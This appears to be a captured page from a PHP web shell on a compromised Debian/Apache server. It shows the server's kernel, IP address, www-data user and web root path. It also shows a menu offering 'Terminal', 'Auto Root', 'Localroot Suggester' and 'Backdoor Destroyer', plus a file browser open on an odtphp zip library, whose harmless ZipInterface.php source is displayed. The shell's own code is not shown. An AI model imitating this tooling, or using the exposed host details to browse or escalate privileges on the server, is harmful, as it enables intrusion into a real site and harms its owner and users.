Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
bdc.bdcloud.fr /
includes /
odtphp /
zip /
Delete
Unzip
Name
Size
Permission
Date
Action
pclzip
[ DIR ]
drwxr-x---
2025-11-08 11:17
PclZipProxy.php
4.33
KB
-rwxr-x---
2023-04-04 15:52
PhpZipProxy.php
2.46
KB
-rwxr-x---
2023-04-04 15:52
ZipInterface.php
1.42
KB
-rwxr-x---
2023-04-04 15:52
Save
Rename
<?php /** * Interface for Zip libraries used in odtPHP * You need PHP 5.2 at least * You need Zip Extension or PclZip library * Encoding : ISO-8859-1 * * @copyright GPL License 2008 - Julien Pauli - Cyril PIERRE de GEYER - Anaska (http://www.anaska.com) * @license https://www.gnu.org/copyleft/gpl.html GPL License * @version 1.3 */ interface ZipInterface { /** * Open a Zip archive * * @param string $filename the name of the archive to open * @return true if openning has succeeded */ public function open($filename); /** * Retrieve the content of a file within the archive from its name * * @param string $name the name of the file to extract * @return the content of the file in a string */ public function getFromName($name); /** * Add a file within the archive from a string * * @param string $localname the local path to the file in the archive * @param string $contents the content of the file * @return true if the file has been successful added */ public function addFromString($localname, $contents); /** * Add a file within the archive from a file * * @param string $filename the path to the file we want to add * @param string $localname the local path to the file in the archive * @return true if the file has been successful added */ public function addFile($filename, $localname = null); /** * Close the Zip archive * @return true */ public function close(); } ?>